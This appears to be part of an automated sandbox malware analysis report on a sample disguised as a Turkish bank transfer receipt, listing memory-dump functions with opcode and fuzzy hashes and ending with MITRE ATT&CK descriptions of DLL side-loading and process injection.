Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc82cf678a40486c228e210a59be7c4017f41a756c43e8fac27f223e651bebae
Instruction ID: e73171c308bd45904be17a6e5b4fb3212553bd7b8b4d79b8b1fe1896214f7c15
Opcode Fuzzy Hash: cc82cf678a40486c228e210a59be7c4017f41a756c43e8fac27f223e651bebae
Instruction Fuzzy Hash: B2414971E003199BEB14DFA5D890BDEBBB5BF84710F148119E415B7340EB70A985CBA0

Function 00FD3CC0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ceed3c02fd3016db2d893daa8fafad1a58a1353a4fe6056f89c1cd91adc095d
Instruction ID: 4296192c65bb0b2113bc0ef6cfe72eb8b245f097fd881985dad61b566d8da5c6
Opcode Fuzzy Hash: 8ceed3c02fd3016db2d893daa8fafad1a58a1353a4fe6056f89c1cd91adc095d
Instruction Fuzzy Hash: 8F31C636B0032987DF185665999437E66ABBBC4320F1C413BDA06D3380DF75CE05ABA2

Function 00FD8EF8 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1416dff1b8de03f3a89bdac9531fc0f20b0604c3a7865be3e48fbd0609eabd49
Instruction ID: 688e78339106717abd6bba981befb737072230b5c7021ab2db104fc80dbb50b5
Opcode Fuzzy Hash: 1416dff1b8de03f3a89bdac9531fc0f20b0604c3a7865be3e48fbd0609eabd49
Instruction Fuzzy Hash: 9D3104303042018FD7359B69D89467E77ABFB853A0B2845ABE052CB391DE29CC42EB51

Function 00FD5658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ea9d65ea1f19dcc30e0a8cd6c15bdba8c568d81ad20cc9c8a9ef5d13f2e65ef
Instruction ID: 1651d3557c2abf550144f5c704ab9da30168cbc4b6558463f210aea958fed463
Opcode Fuzzy Hash: 3ea9d65ea1f19dcc30e0a8cd6c15bdba8c568d81ad20cc9c8a9ef5d13f2e65ef
Instruction Fuzzy Hash: 1C31927560010DEFCF159FA4D984AAE3BA2FB48711F148426F9558B344CB39DD61EBA0

Function 00FD8380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9e112ebfc28669aa03e96c42b480140db29ee9fedbcd4754c68b76bc8b26360
Instruction ID: 0ecc0e1bde78035fbd6412813e62e6ae4b0d5561a8a428328df0798bb793a330
Opcode Fuzzy Hash: b9e112ebfc28669aa03e96c42b480140db29ee9fedbcd4754c68b76bc8b26360
Instruction Fuzzy Hash: 1621F8757002029BDB249669885473E3657AFC67A8F18803AD402CB398DE76CC43F391

Function 00FD62F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 325273746bcca0158a5d01253a0e333a91a3dae76e75d1208e91dfe016d3ebe1
Instruction ID: 3dd6bbcd77e648820c5f615936ff6cc0702955c43ff18099ed81f0f35a2e1b34
Opcode Fuzzy Hash: 325273746bcca0158a5d01253a0e333a91a3dae76e75d1208e91dfe016d3ebe1
Instruction Fuzzy Hash: A42126367046108FC7259B29C49492EB7A3FFC9751718847AE846CB398CF35DC02DB90

Function 00FD28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d848046060fe607b77c8b22fed48c40d3e0a31b6f5c6f3ffe2021f865aadcb29
Instruction ID: 98736460f4c54833f066f679211b624e6e14f00e3dbd10d2a592df68ed0f9217
Opcode Fuzzy Hash: d848046060fe607b77c8b22fed48c40d3e0a31b6f5c6f3ffe2021f865aadcb29
Instruction Fuzzy Hash: 40218375E00204AFCB54DB78C450AAE7BB6EFA9760F148419D80997340DB30EE46EBE1

Function 00D4D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3798316901.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8ef456dca8169447ee5335f9b85b043a8e8f4c38d9de2fb247760becdd04b9
Instruction ID: 690902829d384a5d0c94368d8e43b8e407699457b6aa943d3701e0cad4292d24
Opcode Fuzzy Hash: fd8ef456dca8169447ee5335f9b85b043a8e8f4c38d9de2fb247760becdd04b9
Instruction Fuzzy Hash: AD21D471604344DFDB14DF20D9C4B26BBA6FB88314F24C5ADE8494B292C776D846CA72

Function 056B9EA9 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae00aa7382aeed7b832c58b813b329fda0826e4dbb2e78829d85181f9c0cd47c
Instruction ID: 5d22e44f6ce7324c7bc3f6d31b102b3337effe955d2b56c7763d8b9155a538e6
Opcode Fuzzy Hash: ae00aa7382aeed7b832c58b813b329fda0826e4dbb2e78829d85181f9c0cd47c
Instruction Fuzzy Hash: 4921E0B5D012199FDB10CFA9D584BDEBBF4EB48320F14806AE919AB351D3749A45CFA0

Function 00FD5649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cf57f05bcf7e54a3ea63bfaeb45b197790e45783404ad20fe0dd398db8e758d
Instruction ID: 49c26d7282aca5302a62f6392044ed72fe5b19f8a141ca41bd20cde07fff6c5c
Opcode Fuzzy Hash: 7cf57f05bcf7e54a3ea63bfaeb45b197790e45783404ad20fe0dd398db8e758d
Instruction Fuzzy Hash: 31210572A052089FCB119F68D584B6E3BA2FF84710F14846AF8458B349CB39CE65DBE0

Function 056B8C4A Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16de20de66a426ec27aeaf18b7c95540ad07500a09037bc579fac9ecffac72f
Instruction ID: 0edc5bfce662839bbb6e1cdc96558f86d43a87d3de83f358cddb32e12e4a2572
Opcode Fuzzy Hash: d16de20de66a426ec27aeaf18b7c95540ad07500a09037bc579fac9ecffac72f
Instruction Fuzzy Hash: 2811063170C3845FDB065B78881475E7FABEBC9250B14406AE906DB392DE354C4183A6

Function 00FD4285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6673c0e99ec63799136900dece6b142a239c5a45e094cf33afbb7b0de9e88a17
Instruction ID: e8b3492789a4d6b87749faabf4df84f000e71a13c19eded67719e10d94221b1c
Opcode Fuzzy Hash: 6673c0e99ec63799136900dece6b142a239c5a45e094cf33afbb7b0de9e88a17
Instruction Fuzzy Hash: 23319079E02308CFCB44DFA8E59499DBBB2FF49301B204469E81AAB365D735AD11DF50

Function 056B9EB0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d62e518956f5be25df8a8e9b0478e17884be5b0004d76b5ab8264934da416145
Instruction ID: bf469c82055868330e61d1da1e1a7d5e4f6925fff9f7431ac22484bd86784f94
Opcode Fuzzy Hash: d62e518956f5be25df8a8e9b0478e17884be5b0004d76b5ab8264934da416145
Instruction Fuzzy Hash: 0421E2B5D012199FDB10CFA9D584BDEBBF8FB48320F14806AE909AB354D3749A44CFA0

Function 00FD9761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7922cb53a2c194174653517d83614c773649628b6ba1a9683d328189710fe77f
Instruction ID: 197d6de4dafc7ac1ca3453c25a036cbcb84a03a16c6c8f71f272ca224fb20aab
Opcode Fuzzy Hash: 7922cb53a2c194174653517d83614c773649628b6ba1a9683d328189710fe77f
Instruction Fuzzy Hash: 4F21AD74E052489FDB04CFE1D580AEDBFB6AF49300F18805AE404E7394CB35D940EB60

Function 00FD6300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86ca8d3467eda415c0b7250a1e4b634e68707c395bda57e29d6c19ab73c2147
Instruction ID: 5754d0620fc6457e1df1268a2b82876ba49a53601435e515b20fbae744cbbd22
Opcode Fuzzy Hash: b86ca8d3467eda415c0b7250a1e4b634e68707c395bda57e29d6c19ab73c2147
Instruction Fuzzy Hash: EF11C4367016119FC7295B2AD49492EB7A7FFC976131D447AE906CB354CF31DC029B90

Function 00FDF658 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2b1f7e077fc9dd834a029bcbcd72e867149349090f2e6a07ecaab95ea496f3b
Instruction ID: 0ed8c2ce43b7d6f15896e140f2693e3397be3019e0c52ecc9489868f49b87419
Opcode Fuzzy Hash: b2b1f7e077fc9dd834a029bcbcd72e867149349090f2e6a07ecaab95ea496f3b
Instruction Fuzzy Hash: C3215BB5D013099FDB05EFA8D840B8EBBF2FF45300F1085AAC0549B365E7705A158B92

Function 056B8EF1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fccde2ab08b4a0d985a022fd0c0e63950fdee8e876cb165dcb31b3b66b71776c
Instruction ID: 22db17ee7fbe5c510bb2d3d7022407698d5bcc85d84f5db1bf84375da7e049f9
Opcode Fuzzy Hash: fccde2ab08b4a0d985a022fd0c0e63950fdee8e876cb165dcb31b3b66b71776c
Instruction Fuzzy Hash: E11156768002499FDB10CF99C944BDEBFF9EB48320F14846AE518A7611C379A590CFA5

Function 056B87A8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d30d0810831dd537a3e0787ed9980c7bed09053000aff7c2f5fcd54d10e8754
Instruction ID: 937535747005606679a64d947eea30d9314cc8fb0ec49a8b5103d94206dd432d
Opcode Fuzzy Hash: 4d30d0810831dd537a3e0787ed9980c7bed09053000aff7c2f5fcd54d10e8754
Instruction Fuzzy Hash: AE11677680034DDFDB10CF99C844BDEBBF9EB48320F108429EA18A7211C379A550CFA5

Function 00FDF668 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c13ad21d169d3c404850e2b20ef9e64e5572d4afb636aa8613fd822d08361d
Instruction ID: 090f09ffb610c6399dd3c679330c45d7a8d766f12a59cec8ab3d492ec0de76eb
Opcode Fuzzy Hash: 98c13ad21d169d3c404850e2b20ef9e64e5572d4afb636aa8613fd822d08361d
Instruction Fuzzy Hash: DF114CB5D01209DFEB04EFA9D940B9EBBF2FB45300F10C5A9C0149B364EB709A158F91

Function 00FD27F0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a8244df47023efa1f3fe643c15b9afb29f9d19be8cd58173bf0838821a192b
Instruction ID: 8174b8d312196a5a66450a06e0af185ba96f9be1956b15fb2350f20b414f888d
Opcode Fuzzy Hash: 07a8244df47023efa1f3fe643c15b9afb29f9d19be8cd58173bf0838821a192b
Instruction Fuzzy Hash: 9F21CEB9C0120A8FCF00EFA9D9856EEBFF0EF19305F14416AD805B2214EB355A95DBA0

Function 056B8431 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c9dce82ac108c457d70f6e3b36446cc03b3eb579ba5b91cab7a96b8bd518db
Instruction ID: 2af7ab4f688a93d635c390fbc03cf3087eab9be900cc00e2dbe7f9168c0b4e73
Opcode Fuzzy Hash: 64c9dce82ac108c457d70f6e3b36446cc03b3eb579ba5b91cab7a96b8bd518db
Instruction Fuzzy Hash: AA11FA35E402498FEB14DFA8E954BEEBBB5AF89311F0081A5D908A7345EA709E428B51

Function 00D4D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3798316901.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction ID: 56d9d9a02d085bfafd74e4fa6ec110b82c8e30df326e6df2cb4a697237a50c6c
Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction Fuzzy Hash: 59119D75504284DFCB15CF10D9C4B15BBA2FB88314F28C6AED8494B696C33AD84ACF62

Function 00FD5E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b82092028e740c94cbbc26169b8b06ca7b0bccece809d8cbea54df6cbd88217
Instruction ID: f4358ea99f4bf113191a77c90535ebd1c201a4b82b8ac42f9a0c4646a550def8
Opcode Fuzzy Hash: 0b82092028e740c94cbbc26169b8b06ca7b0bccece809d8cbea54df6cbd88217
Instruction Fuzzy Hash: 4201DD727002157FC7269E589850AFF3BEBEBC9760F184027F545D7284CA7ACD2297A0

Function 00FDE8E8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c583e51fb6a8c1af24ed355960322d9f9cfdb2e8efefc799bb1e008352b63d20
Instruction ID: 393e4383ccaa1fed6c32bea041dc42f54e34f3eba56eb891035471506f55e1d2
Opcode Fuzzy Hash: c583e51fb6a8c1af24ed355960322d9f9cfdb2e8efefc799bb1e008352b63d20
Instruction Fuzzy Hash: E7116D79D0020A9FDB00DFA8D844AEEBBB1FB49310F004565E910E3354D7786A56DBA1

Function 00FDABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 488dab3659748b1ef81d1698809bcd12f809af2ed3faac6a71fb8841dffdab17
Instruction ID: 90e9a7bd335c800e22067f7efbcd38c6a8df7cf49e24ae59e2dd0f4df452e28f
Opcode Fuzzy Hash: 488dab3659748b1ef81d1698809bcd12f809af2ed3faac6a71fb8841dffdab17
Instruction Fuzzy Hash: 79F0F6357106104B87257A3E9454A2AB6EFEFC8B7131D407BE805C7365EE21CC039395

Function 00D3D005 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3798253581.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d3d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0f905e08a1ca791ff1c31948d4d3a39312ebbaee6da263bd3e1ff4d97d195d
Instruction ID: 2314c9c5bbf552c140c4732578087327724e6d19da761c054628e5e0bd7dafda
Opcode Fuzzy Hash: 5f0f905e08a1ca791ff1c31948d4d3a39312ebbaee6da263bd3e1ff4d97d195d
Instruction Fuzzy Hash: 4501EC751097C0AFC316CF15CD95C22BFB9EF8662071A84DAE8858F263C625EC06CB61

Function 00D3D01F Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3798253581.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d3d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eddd1590bb416598ebe770d09621fe4162c1ba03336c38d7c38881cb3beba4ab
Instruction ID: dfacbc2c1562c648a03c8994a28cfd35475e03034a7ede7ddfb8282bd1e8cec3
Opcode Fuzzy Hash: eddd1590bb416598ebe770d09621fe4162c1ba03336c38d7c38881cb3beba4ab
Instruction Fuzzy Hash: 61F04976200600AF8324CF0AD984C23FBADEBC4770719C4AAE84A4B712C271EC02CEB0

Function 00FD9C2C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 363ee00ed02801051eb90090e2e875302a2c8deb38352d886359e239c216d4d8
Instruction ID: 3c4edade0c24e7b0b28bce8c4abc3fc042c8f7886bc502e8edd5e0053d3790d4
Opcode Fuzzy Hash: 363ee00ed02801051eb90090e2e875302a2c8deb38352d886359e239c216d4d8
Instruction Fuzzy Hash: 18F08272E10118AFDB14DF59D844BEEBBF6EBC8321F14C026EA18C3214D37149159B50

Function 00FD6739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f0c6c49df7d5b8e46c13e87d792195eb7dd85d0fd20e19dae94f7208698e91
Instruction ID: 0c87f31795d1e8c2774ad8d4d8371cfd2059701a3145d79c351df0f96995c9a8
Opcode Fuzzy Hash: c0f0c6c49df7d5b8e46c13e87d792195eb7dd85d0fd20e19dae94f7208698e91
Instruction Fuzzy Hash: D8E0C2700483865FC342AB60DC4089137AEAA4121074441A0E4004A15ADBBDDCA68BB1

Function 00FD28A2 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b71bcdef529093ad92bb7740739874c6b1351e162aca9c9b117d9e2f49f66d
Instruction ID: d4b67cf2d6e7822a40f04add71a64a6dfe40872d6859f6cb2c7a3aff51b63aa3
Opcode Fuzzy Hash: c8b71bcdef529093ad92bb7740739874c6b1351e162aca9c9b117d9e2f49f66d
Instruction Fuzzy Hash: B6E08676D1132687C701E7B4DC401EEFB34AFD1332F59862BC46532180FB30625886A1

Function 00FD28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a5725790bf3e06ede0c6875a7e0b8dd4c5bb2c100edbe90a36ff9dd286a153
Instruction ID: d26cce68da823cebe3fb35b2015d34ae8ca9a8fea085066bcf97393b9e8d8307
Opcode Fuzzy Hash: b6a5725790bf3e06ede0c6875a7e0b8dd4c5bb2c100edbe90a36ff9dd286a153
Instruction Fuzzy Hash: 65D01235D2132A578B00A6A5DC044EEFB38EE96621B504626D51437140EB70265986B1

Function 00FDD6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d6bc4653d05671d5fa8347e0d397a99be168427c49c0543f8a1b4ef45abc1e
Instruction ID: 84a68bb84b74687cd752e0f09d0964c0a4ac6594262d84095ab311fc1228e28a
Opcode Fuzzy Hash: e3d6bc4653d05671d5fa8347e0d397a99be168427c49c0543f8a1b4ef45abc1e
Instruction Fuzzy Hash: 76D0E279E4010CCBCB30DFA8E5844DCBB71EB49321B24542AD926A3202C63454108F41

Function 00FDAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c59c6449bedbb5bb08c398dccddb819607f07924e739e30af8778eeb8e79f71
Instruction ID: 023c114ee698b240c0dd9d92b182c326e2e6d44f12ea76af65b15ee080bb6cfd
Opcode Fuzzy Hash: 5c59c6449bedbb5bb08c398dccddb819607f07924e739e30af8778eeb8e79f71
Instruction Fuzzy Hash: 9CD0677AB00008EFDB149F98E8809DDF7B6FB98221B048156E915A3264C6319965DB54

Function 00FD6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1bc52d99336d2abe973dbfd90cb0322bc266fbe4b6e263f1f103f2d4d5f547a
Instruction ID: 944cece375b184908f55603816cbf5591a0aba78395c5c3983fb4a7adc6d7a10
Opcode Fuzzy Hash: c1bc52d99336d2abe973dbfd90cb0322bc266fbe4b6e263f1f103f2d4d5f547a
Instruction Fuzzy Hash: DAC08C720043484BE601F771FD86919336EAAC0300B849620A0090A74EEFB8E9B58FE1

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

